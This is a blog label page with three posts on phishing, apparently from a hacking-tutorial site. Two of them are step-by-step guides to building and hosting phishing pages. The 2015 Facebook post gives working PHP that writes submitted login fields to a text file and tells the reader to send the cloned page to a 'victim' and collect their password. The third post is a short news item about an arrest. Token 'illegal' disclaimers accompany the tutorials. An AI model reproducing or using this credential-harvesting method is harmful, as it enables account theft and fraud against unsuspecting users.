Showing posts with label Phishing. Show all posts
Showing posts with label Phishing. Show all posts

Thursday, 18 February 2016

How to make a Phishing page (Advance) (Undetectable) (2016)

 
As'salamu Aleykum

Hello, and welcome to SufiyanWeb
Today I will be teaching you how to make advance phishing page

You will need:
  1. A brain 
  2. Phishing Files(Download from here
  3. Hosting account(Any free account
If you already have an web hosting account then SKIP the below step
First of all you will need to sign up on web hosting account(free hosting also is Okay but it will suspend your account for phishing attack)

After getting web hosting account you can create free domain(You can use 000webhost,1freehosting or any hosting website you like)
After you have created your domain, your website is ready
You might have got a link similar to "example.yourhosting.com"
If you are able to open example.yourhosting.com , then you have done all the steps correctly and you can move to next step.
Now open "FILE MANAGER"(In some websites you have to locate to 'file manager > public_html')
You might see a file named "default.php"(it can be "index.php" or similar to it)
Now delete that default.php(In my case I have "default.php")
and now click on "upload" and upload the file that you downloaded before(files.zip)
After your the folder is uploaded you need to extract files from zip file
Right click on files.zip and choose "Extract files"
Now you will have the files uploaded on your website.
You will get a file name index.html or index.php in "public_html"
Now open example.yourhosting.com and you are done with making a advance phishing page
IF your Phishing website is not working properly then check what step you did mistake.

Thats all for now and enjoy your advance phishing page.
HACKING IS ILLEGAL AND INFORMATION PROVIDED IS "ONLY" FOR EDUCATIONAL PURPOSE

Comment below if you have any problem.

Wednesday, 18 March 2015

Three cybercriminals arrested for Phishing




The police has arrested three persons which allegedly are responsible for sending fake banking emails to unaware internet users. The three persons were sending fake banking emails to phish information which they would use to generate an revenue.

An 68-year old male was targeted by the phishing e-mail, the 68-year-old male did provide his information, but after a little while he became aware of the phishing mail and he informed the police to investigate the case.

The criminals, which are 21,22 and 25-years-old had arranged an appointment with the 68-year-old male to pick-up the banking card. The police was informed about the appointment, and the police was able to arrest the three cybercriminals without any problems.
The three Dutch cybercriminals are still arrested.


If you liked this post, say thanks by sharing it:

Saturday, 31 January 2015

How to hack Facebook with phishing page


Steps to create a phishing page:

1) Go to the Facebook page ,and then right click on the page, You will see the option “view page source”,click on it.
2) Now a new tab will open which contain a source code,
Select and COPY all the code and paste it in a notepad.
3) Now open the notepad and press CTRL+F,and type ACTION.
4) You will have to find a text which looks like :

action="https://www.facebook.com/login.php?login_attempt=1

5) Delete all the text written in red colour and instead of it write post.php.then it will look like :
action="post.php"

6) Now save it on your desktop with the name index.htm
7) Now your phishing page is ALMOST READY.
8) Open a new NOTEPAD and save the given data with the name post.php

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9) You have two files now one is index.htm and another is post.php
Remember file extension(.php) is important.
10) Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11) I prefer u to use 000webhost because it will be easy to use.
12) You have to make a account in that
13) Now go control panel ,then on file manager.
14) After that a new window will pop up,Now go to public_html.
15) Delete the file named default.php, After that upload two files that we created (index.htm and post.php)
Upload them one by  one .
16) Now the last step click on view of index.htm it will look same as facebook page.
17) Copy the URL of that page and send this link to your victim,when your victim try to login in to it with the username and password.
The page redirectly connect to facebook. and you will be now able to see his password.
18) Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
19) Click on view now u will have your friend's password and email id.


This is a simple trick to hack any Facebook password account by phishing page.

If you are not able to create a phishing page then I will provide you a video tutorial link
Comment below if you have any problem in any step


Phishing is a ILLEGAL activity!
You can make phishing page for Facebook and also you can make phishing page of any website by following SIMILAR steps